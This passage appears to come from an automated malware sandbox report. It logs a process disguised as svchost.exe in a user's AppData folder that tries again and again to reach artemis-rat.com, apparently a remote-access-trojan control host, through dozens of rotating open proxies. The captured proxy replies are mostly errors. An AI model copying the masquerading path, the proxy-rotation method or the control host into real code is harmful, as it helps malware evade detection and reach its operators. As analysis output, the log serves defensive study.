                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2502192.168.2.55811843.155.142.1161567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.524900913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2503192.168.2.55819146.17.63.166444443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.533401012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.829971075 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2504192.168.2.55816947.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.539856911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2505192.168.2.558170154.12.178.1072998543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.539937973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2506192.168.2.558168125.227.225.157338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.540205002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2507192.168.2.558195121.128.194.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.540205956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2508192.168.2.558097120.77.148.138808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.540435076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.878246069 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2509192.168.2.558098167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.540435076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2510192.168.2.558140148.72.206.843476143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.563369036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.333482027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.443039894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.537065029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849405050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2511192.168.2.558328104.17.84.1508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.565341949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.719847918 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2512192.168.2.55820652.67.10.183312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.570250034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.899240971 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2513192.168.2.558202177.12.118.1608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.572932005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2514192.168.2.558311142.4.123.418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.576638937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2515192.168.2.557170162.223.94.1648043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.577100039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.646107912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.646687984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2516192.168.2.558325159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.577218056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2517192.168.2.558145194.28.91.10567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.583933115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2518192.168.2.55838431.43.179.1608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.608773947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.763484955 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2519192.168.2.558110146.190.84.2091825543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.610707045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.333571911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.443027973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.537054062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646692991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2520192.168.2.55815520.206.106.1928043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.610728979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.932524920 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2521192.168.2.558361172.67.206.1058043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.610853910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.764961004 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2522192.168.2.558247202.162.219.10108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.621432066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2523192.168.2.558275211.222.252.1878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.627131939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.931523085 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2524192.168.2.558411162.159.242.1508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.627338886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.790594101 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2525192.168.2.55827684.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.640494108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2526192.168.2.5582808.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.642266035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
